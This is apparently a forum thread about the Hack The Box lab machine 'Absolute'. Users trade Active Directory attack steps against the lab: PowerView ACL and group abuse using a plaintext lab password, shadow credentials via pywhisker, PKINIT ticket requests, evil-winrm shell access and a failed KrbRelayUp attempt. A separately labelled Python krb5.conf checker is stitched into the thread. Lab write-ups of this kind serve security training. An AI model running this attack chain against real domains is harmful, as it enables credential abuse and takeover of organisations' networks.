Posts: 78 Threads: 0 Joined: N/A September 28, 2022 at 3:05 AM
In case people haven't noticed yet, when setting up the domain from linux, ensure the realm is in all UPPER CASE and matches exactly with what the DC asks for. I figured that's why this box is called absolute.

[code]
python3 ~/tools/pywhisker/pywhisker.py -d ABSOLUTE.HTB -t m.lovegod -u [email protected] -k --no-pass -a list
Searching for the target account
Target user found: CN=m.lovegod,CN=Users,DC=absolute,DC=htb
Attribute msDS-KeyCredentialLink is either empty or user does not have read permissions on that attribute
[/code]

[code]
cat /etc/krb5.conf
[libdefaults]
    default_realm = ABSOLUTE.HTB

[realms]
    ABSOLUTE.HTB = {
        kdc = DC.ABSOLUTE.HTB
        admin_server = ABSOLUTE.HTB
    }
[/code]
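A quick way to catch the realm-case mistake meowmeowattack describes before Kerberos does: the following is an added example, not code from the thread, that parses a krb5.conf and flags realm names that are not upper case or a default_realm that matches its [realms] stanza only case-insensitively. The sample config is constructed for the example (the lower-case default_realm is the deliberate mistake).

```python
# Added example (not from the thread): a sanity check for the realm-case pitfall above.
# It parses [libdefaults] and [realms] from krb5.conf text and reports realm names that
# are not upper case, or a default_realm whose [realms] stanza matches only by case.
import re

# Constructed sample: the lower-case default_realm is the deliberate mistake.
SAMPLE_KRB5_CONF = """\
[libdefaults]
    default_realm = absolute.htb
[realms]
    ABSOLUTE.HTB = {
        kdc = DC.ABSOLUTE.HTB
        admin_server = ABSOLUTE.HTB
    }
"""

def parse_krb5_conf(text):
    """Return (libdefaults dict, {realm: {key: value}}) from krb5.conf text."""
    libdefaults, realms, section, current = {}, {}, None, None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop comments and padding
        if not line:
            continue
        if m := re.fullmatch(r"\[(\w+)\]", line):  # [section] header
            section, current = m.group(1), None
        elif section == "realms" and (m := re.fullmatch(r"(\S+)\s*=\s*\{", line)):
            current = m.group(1)                     # REALM = { opens a stanza
            realms[current] = {}
        elif line == "}":
            current = None
        elif "=" in line:
            key, value = (p.strip() for p in line.split("=", 1))
            if section == "libdefaults":
                libdefaults[key] = value
            elif current is not None:
                realms[current][key] = value
    return libdefaults, realms

def check_realms(text):
    """Return a list of problems; an empty list means the realm names are consistent."""
    libdefaults, realms = parse_krb5_conf(text)
    default = libdefaults.get("default_realm", "")
    problems = [f"realm {r!r} is not upper case" for r in [default, *realms] if r != r.upper()]
    if not default:
        problems.append("no default_realm in [libdefaults]")
    elif default not in realms:
        same = [r for r in realms if r.upper() == default.upper()]
        problems.append(f"default_realm {default!r} has no [realms] stanza"
                        + (f" (case-only mismatch with {same[0]!r})" if same else ""))
    return problems
```

Run `check_realms(open("/etc/krb5.conf").read())` against a real file; an empty list means the realm names are consistent with the AD convention.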
Posts: 57 Threads: 0 Joined: N/A September 28, 2022 at 3:12 AM
(September 28, 2022, 03:05 AM)meowmeowattack Wrote: In case people haven't noticed yet, when setting up the domain from linux, ensure the realm is in all UPPER CASE and matches exactly with what the DC asks for. [...]

This is sooooooooooooooooooooo dumb. Thanks a million. Got Evil-WinRM access. Got user.

Posts: 78 Threads: 0 Joined: N/A September 28, 2022 at 3:15 AM
(September 28, 2022, 03:12 AM)samhub123 Wrote: This is sooooooooooooooooooooo dumb. Thanks a million. Got Evil-WinRM access. Got user.

np, please share some step summaries if you'd like

Posts: 57 Threads: 0 Joined: N/A September 28, 2022 at 3:24 AM
Here you go. First, on my windows machine I add the user m.lovegod to the "Network Audit" group.

[code]
$dc_domain="absolute.htb"
$SecPassword = ConvertTo-SecureString "AbsoluteLDAP2022!" -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('absolute.htb\m.lovegod', $SecPassword)
Add-DomainObjectAcl -Credential $Cred -TargetIdentity "Network Audit" -Rights all -DomainController dc.absolute.htb -principalidentity "m.lovegod"
Add-ADPrincipalGroupMembership -Identity m.lovegod -MemberOf 'Network Audit' -Credential $Cred -Server dc.absolute.htb
Get-DomainGroupMember -Identity 'network audit' -Domain $dc_domain -DomainController dc.absolute.htb -Credential $cred
[/code]

The machine resets its AD config very quickly, so as soon as those commands are done, from my linux machine I do:

[code]
getTGT.py absolute.htb/m.lovegod:
export KRB5CCNAME=
[/code]

[code]
pywhisker.py -d absolute.htb -u "m.lovegod" -k --no-pass -t "winrm_user" --action "add"
[/code]

From the above command we get a pfx file and a password associated with it. Then we use the PKINITtools to get a ticket from the pfx file as follows:

[code]
gettgtpkinit.py absolute.htb/winrm_user -cert-pfx -pfx-pass winrm_user_ccache
[/code]

Then we get the ccache file for winrm_user, then edit the /etc/krb5.conf file to make sure everything is in CAPS. Refer to @meowmeowattack's post to do that. Use evil-winrm to get a shell:

[code]
evil-winrm -i DC.ABSOLUTE.HTB -r ABSOLUTE.HTB
[/code]

Then read the user flag on desktop.

Posts: 57 Threads: 0 Joined: N/A September 28, 2022 at 3:44 AM
Two very interesting binaries in the C:/temp folder.
one of them is KrbRelay.exe

Posts: 23 Threads: 0 Joined: N/A September 28, 2022 at 6:57 AM
(September 28, 2022, 03:24 AM)samhub123 Wrote: Here you go. First, on my windows machine I add the user m.lovegod to the "Network Audit" group. [...]

what's wrong ?

[code]
Exception calling "FindAll" with "0" argument(s): "Unknown error (0x80005000)"
At C:\Users\hh\Desktop\PowerView.ps1:6663 char:20
+ else { $Results = $ObjectSearcher.FindAll() }
+                   ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : DirectoryServicesCOMException

Unable to resolve principal: m.lovegod
At C:\Users\hh\Desktop\PowerView.ps1:8529 char:13
+ throw "Unable to resolve principal: $PrincipalIdentity"
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : OperationStopped: (Unable to resolve principal: m.lovegod:String) [], RuntimeException
    + FullyQualifiedErrorId : Unable to resolve principal: m.lovegod
[/code]

Posts: 57 Threads: 0 Joined: N/A September 28, 2022 at 7:48 AM
Tried KRBRelayUp attack but it fails on step 1 with error:

[code]
[-] Could not add new computer account:
[-] The server cannot handle directory requests.
[/code]
gonna take a short break now.

Posts: 78 Threads: 0 Joined: N/A September 28, 2022 at 7:51 AM
(September 28, 2022, 03:14 AM)Hacker2222 Wrote:
    (September 28, 2022, 02:49 AM)samhub123 Wrote:
        (September 28, 2022, 02:38 AM)Hacker2222 Wrote:
            (September 28, 2022, 02:16 AM)samhub123 Wrote: Okay, I was able to get ccache file for winrm_user using pywhisker. From that I also got the NThash for winrm_user, but using CME with hash and also with the ticket, it seems like I cannot access winrm using winrm_user.

            if u have ccache file then just use evilwinrm?? how did u add lovegod to the group tho?

        [code]
        $dc_domain="absolute.htb"
        $SecPassword = ConvertTo-SecureString "AbsoluteLDAP2022!" -AsPlainText -Force
        $Cred = New-Object System.Management.Automation.PSCredential('absolute.htb\m.lovegod', $SecPassword)
        Add-DomainObjectAcl -Credential $Cred -TargetIdentity "Network Audit" -Rights all -DomainController dc.absolute.htb -principalidentity "m.lovegod"
        Add-ADPrincipalGroupMembership -Identity m.lovegod -MemberOf 'Network Audit' -Credential $Cred -Server dc.absolute.htb
        Get-DomainGroupMember -Identity 'network audit' -Domain $dc_domain -DomainController dc.absolute.htb -Credential $cred
        [/code]
        Let me know if you get winrm working.

    thanks ................... need to make windows server vm i think ........ commando vm cant run DomainObjectAcl i guess ..... will catch up :P

I re-installed a windows server 2019 from scratch and installed the activedirectory module, still getting password incorrect error with the powershell script above, so shouldn't be anything to do with the distribution. There might still be a setup issue.

FYI, I did the following to setup the windows server:
* Install ActiveDirectory module
* Add hosts file entry for absolute.htb
* Change internet time server to absolute.htb
* Change network adapter DNS server to the target DC IP

[code]
Exception calling "FindAll" with "0" argument(s): "The user name or password is incorrect. "
At C:\tev\PowerView.ps1:6663 char:20
+ else { $Results = $ObjectSearcher.FindAll() }
+                   ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : DirectoryServicesCOMException

Unable to resolve principal: m.lovegod
At C:\tev\PowerView.ps1:8529 char:13
+ throw "Unable to resolve principal: $PrincipalIdentity"
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : OperationStopped: (Unable to resolve principal: m.lovegod:String) [], RuntimeException
    + FullyQualifiedErrorId : Unable to resolve principal: m.lovegod
[/code]
Posts: 57 Threads: 0 Joined: N/A September 28, 2022 at 7:56 AM
(September 28, 2022, 07:51 AM)meowmeowattack Wrote: I re-installed a windows server 2019 from scratch and installed the activedirectory module, still getting password incorrect error with the powershell script above, so shouldn't be anything to do with the distribution. There might still be a setup issue. [...]

what command you got that error on?

Posts: 32 Threads: 0 Joined: N/A September 28, 2022 at 7:57 AM
(September 28, 2022, 07:56 AM)samhub123 Wrote: what command you got that error on?

[code]
Add-DomainObjectAcl -Credential $Cred -TargetIdentity "Network Audit" -Rights all -DomainController dc.absolute.htb -principalidentity "m.lovegod"
[/code]